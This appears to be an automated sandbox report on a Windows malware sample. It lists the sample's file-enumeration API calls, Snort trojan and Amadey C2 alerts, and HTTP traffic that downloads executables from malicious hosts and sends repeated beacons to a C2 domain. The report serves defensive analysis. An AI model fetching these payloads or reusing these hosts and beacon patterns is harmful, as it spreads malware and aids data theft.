Source: C:\Users\user\AppData\Local\Temp\7063.exe, Code function: 17_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\7063.exe, Code function: 17_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\7063.exe, Code function: 17_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\7063.exe, Code function: 17_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\7063.exe, Code function: 17_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,

                          Networking:

                          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                          Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.6:49874 -> 141.8.194.74:80
                          Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.6:49886 -> 141.8.194.74:80
                          Source: TrafficSnort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.6:49888 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49887 -> 185.215.113.35:80
                          System process connects to network (likely due to code injection or exploit)
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                          Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.47.54.36 25
                          Source: C:\Windows\explorer.exeDomain query: unicupload.top
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 8.209.67.104 443
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exeDomain query: goo.su
                          Source: C:\Windows\explorer.exeDomain query: transfer.sh
                          Source: C:\Windows\explorer.exeDomain query: a0621298.xsph.ru
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /3.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /advert.msi HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 132Host: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET /123.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET //l/f/N2z-VH4BZ2GIX1a33Fax/e946ea03b0a56043b0189e637403106a5b3aad8e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET /442.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /443.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET //l/f/N2z-VH4BZ2GIX1a33Fax/4457553c06dee2e98e4f451cad0abfa16d7760a4 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET /File.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /512412.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /RM.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:13 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:17 GMTContent-Type: application/x-msdos-programContent-Length: 327680Connection: closeLast-Modified: Thu, 13 Jan 2022 22:29:02 GMTETag: "50000-5d57e369a77dd"Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:50 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:58 GMTContent-Type: application/x-msdos-programContent-Length: 373760Connection: closeLast-Modified: Wed, 12 Jan 2022 08:30:43 GMTETag: "5b400-5d55e62ba577e"Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 22:30:04 GMTContent-Type: application/octet-streamContent-Length: 356864Last-Modified: Thu, 13 Jan 2022 20:50:05 GMTConnection: keep-aliveETag: "61e0907d-57200"Expires: Thu, 20 Jan 2022 22:30:04 GMTCache-Control: max-age=604800Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 22:30:10 GMTContent-Type: application/octet-streamContent-Length: 357376Last-Modified: Thu, 13 Jan 2022 19:33:07 GMTConnection: keep-aliveETag: "61e07e73-57400"Expires: Thu, 20 Jan 2022 22:30:10 GMTCache-Control: max-age=604800Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 22:30:14 GMTContent-Type: application/octet-streamContent-Length: 226816Last-Modified: Thu, 13 Jan 2022 19:31:57 GMTConnection: keep-aliveETag: "61e07e2d-37600"Expires: Thu, 20 Jan 2022 22:30:14 GMTCache-Control: max-age=604800Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Jan 2022 22:30:14 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:58 GMTETag: "61d8c846-dfcff"Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 22:30:16 GMTContent-Type: application/octet-streamContent-Length: 535232Last-Modified: Thu, 13 Jan 2022 19:32:17 GMTConnection: keep-aliveETag: "61e07e41-82ac0"Expires: Thu, 20 Jan 2022 22:30:16 GMTCache-Control: max-age=604800Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:16 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 22:30:17 GMTContent-Type: application/octet-streamContent-Length: 2387648Last-Modified: Thu, 13 Jan 2022 20:12:05 GMTConnection: keep-aliveETag: "61e08795-246ec0"Expires: Thu, 20 Jan 2022 22:30:17 GMTCache-Control: max-age=604800Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:19 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 22:30:23 GMTContent-Type: application/octet-streamContent-Length: 354816Last-Modified: Thu, 13 Jan 2022 22:06:44 GMTConnection: keep-aliveETag: "61e0a274-56a00"Expires: Thu, 20 Jan 2022 22:30:23 GMTCache-Control: max-age=604800Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 22:30:39 GMTContent-Type: application/octet-streamContent-Length: 34272Last-Modified: Thu, 13 Jan 2022 21:50:37 GMTConnection: keep-aliveETag: "61e09ead-85e0"Expires: Thu, 20 Jan 2022 22:30:39 GMTCache-Control: max-age=604800Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 22:30:43 GMTContent-Type: application/octet-streamContent-Length: 535232Last-Modified: Thu, 13 Jan 2022 21:51:04 GMTConnection: keep-aliveETag: "61e09ec8-82ac0"Expires: Thu, 20 Jan 2022 22:30:43 GMTCache-Control: max-age=604800Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 22:30:52 GMTContent-Type: application/octet-streamContent-Length: 2387648Last-Modified: Thu, 13 Jan 2022 21:51:33 GMTConnection: keep-aliveETag: "61e09ee5-246ec0"Expires: Thu, 20 Jan 2022 22:30:52 GMTCache-Control: max-age=604800Accept-Ranges: bytes
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qsmgbhufo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://asruhu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jcgov.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://obmpjgr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sstfqxq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jlldr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://voqqwvg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmkns.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhgexnr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yhmjbvbr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hyjsal.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dgxouben.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bculwb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qfpwti.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xvnibudur.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wmvxxhaln.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ogoctcljqs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ioktb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dukmi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mcwxjjc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ohvdekeqkm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: GET /6.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 185.7.214.171:8080
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mlhkcu.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 216 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vevlc.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 356 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ohlut.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 242 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://omhdbkt.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 169 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mfconnslgq.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 240 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pubhrhxb.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 196 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ajgkqwkg.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 364 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xrbspm.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 273 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://epcciphsoh.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 332 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tbqbqbxaj.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 354 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://yedkq.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 344 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nekvodf.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 310 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ywykfwn.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 134 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qfbgcss.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 236 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lxjysfgjrh.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 288 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qxnyvqdps.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 326 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wcdhabii.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 270 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ynptmns.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 149 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://yjoyannoc.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 161 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vsnokv.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 219 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wlmasccc.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 312 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qalbmnobc.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 344 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qmvwr.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 306 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fhfjy.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 285 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://krgodthiqk.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 295 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fpepckdf.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 250 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ovhmquitm.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 346 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jbmqdifhe.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 361 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: GET /9.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: a0621298.xsph.ru
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fkgaaiey.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 369 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kebbk.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 214 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hoircbi.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 322 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://aglrl.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 135 | Host: host-data-coin-11.com
